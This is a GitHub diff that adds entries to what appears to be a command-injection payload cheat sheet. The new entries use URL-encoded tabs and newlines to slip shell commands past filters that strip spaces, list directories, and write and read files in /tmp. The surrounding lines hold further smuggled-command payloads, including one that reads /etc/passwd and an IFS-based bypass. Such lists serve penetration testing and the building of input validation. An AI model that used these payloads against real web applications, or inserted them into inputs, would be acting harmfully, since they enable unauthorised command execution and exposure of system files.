File tree 1 file changed +18
-0
lines changed
1 file changed +18
-0
lines changed Original file line number Diff line number Diff line change @@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
9696IFS=,;`cat<<<uname,-a`
9797```
9898
99+ Tabs work as separators in web apps where spaces are removed.
100+
101+ ``` powershell
102+ ;ls%09-al%09/home
103+ drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
104+ drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
105+ drwx------ 2 root root 16384 Jan 10 13:31 lost+found
106+ drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
107+ ```
108+
99109Works on Windows only.
100110
101111``` powershell
@@ -109,6 +119,14 @@ ping%PROGRAMFILES:~10,-5%IP
109119something%0Acat%20/etc/passwd
110120```
111121
122+ You can also write files.
123+
124+ ``` powershell
125+ ;cat>/tmp/hi<<EOF%0ahello%0aEOF
126+ ;cat</tmp/hi
127+ hello
128+ ```
129+
112130### Bypass characters filter via hex encoding
113131
114132Linux
You can’t perform that action at this time.
0 commit comments